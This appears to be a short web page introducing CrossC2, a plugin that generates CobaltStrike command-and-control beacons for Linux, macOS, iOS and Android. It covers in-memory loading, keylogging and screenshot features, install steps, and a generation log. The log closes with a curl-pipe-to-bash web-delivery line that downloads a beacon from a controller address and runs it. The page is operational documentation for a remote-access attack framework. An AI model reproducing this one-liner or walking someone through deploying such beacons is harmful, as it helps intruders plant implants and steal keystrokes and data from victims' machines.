Cross C2 Introduction
Link - https://gloxec.github.io/CrossC2/en/
Generate CobaltStrike's cross-platform beacon
The test preview version supports Android & iOS.
Open API supports Linux and MacOS systems Loading from memory, no landing method Executing user-defined dynamic libraries (.so / .dylib) or executable files (ELF / MachO).
CobaltSttrike provides various result set interfaces, which can flexibly return information and easily implement portscan, screen shots, keyboard records, etc..
Support architecture description:
| Windows | Linux | MacOS | iOS | Android | Embedded | |
|---|---|---|---|---|---|---|
| Run Env (x86) | √ | |||||
| Run Env (x64) | √ | √ | √ | |||
| gen beacon (x86) | √ | √ | ||||
| gen beacon (x64) | √ | √ | ||||
| gen beacon (armv7) | ⍻ | √ | ||||
| gen beacon (arm64) | √ | √ | ||||
| gen beacon (mips[el]) | ⍻ |
Restricted description:
- Linux: For particularly old systems, you can choose "Linux-GLIBC" option in cna (around 2010)
- MacOS: Latest systems only support 64-bit programs
- iOS: sandbox, restricted cmd
- Embedded: only *nix
- ⍻ : Loader is still in progress
Install
Download:
- CrossC2.cna
- genCrossC2
CS Env
- copy CrossC2.cna and genCrossC2 file to
CobaltStrike's rootdir (Must be in the same directory ) - choose
Script Manager,addCrossC2.cna(If successfully installed, the menu bar will have an additional itemCrossC2) - Modify the
genCrossC2path in theCrossC2.cnascript to the real path
exec("/xxx/xxx/genCrossC2"... -> exec("/opt/cs/genCrossC2"...
Usage
teamserver
For some reasons, only HTTPS beacon is currently supported.
Copy .cobaltstrike.beacon_keys from the cs directory on the server to the local directory.
.cna plugin way
Menu Bar: CrossC2 -> CrossC2 Payload Generator -> genCrossC2
Can be configured in the pop-up dialog:
1. Select beacon_key (the path cannot contain spaces, the problem is not solved yet)
2. A dynamic library of custom communication protocols that needs to be bound to beacon
3. Payload type (Staged generated shellcode requires stagerServer)
The information status will be prompted in the event interface during generation
05/01 23:31:03 *** /mnt/cc2/genCrossC2.MacOS 172.16.251.1 5555 /tmp/beacon_keys null MacOS x64 /tmp/CrossC2-test
05/01 23:31:06 *** genCrossC2 beacon -> *[success] : Packed 1532232 byte.
05/01 23:31:07 *** hook hosted CrossC2 beacon MacOS x64 @ http://172.16.251.1:55413/iqEBVKwHoZ
05/01 23:31:07 *** hook hosted Script Unix Web Delivery (curl) @ http://172.16.251.1:55413/a
05/01 23:31:07 *** CrossC2 MacOS x64: curl -A o -o- -L http://172.16.251.1:55413/a | bash -s
0 Comments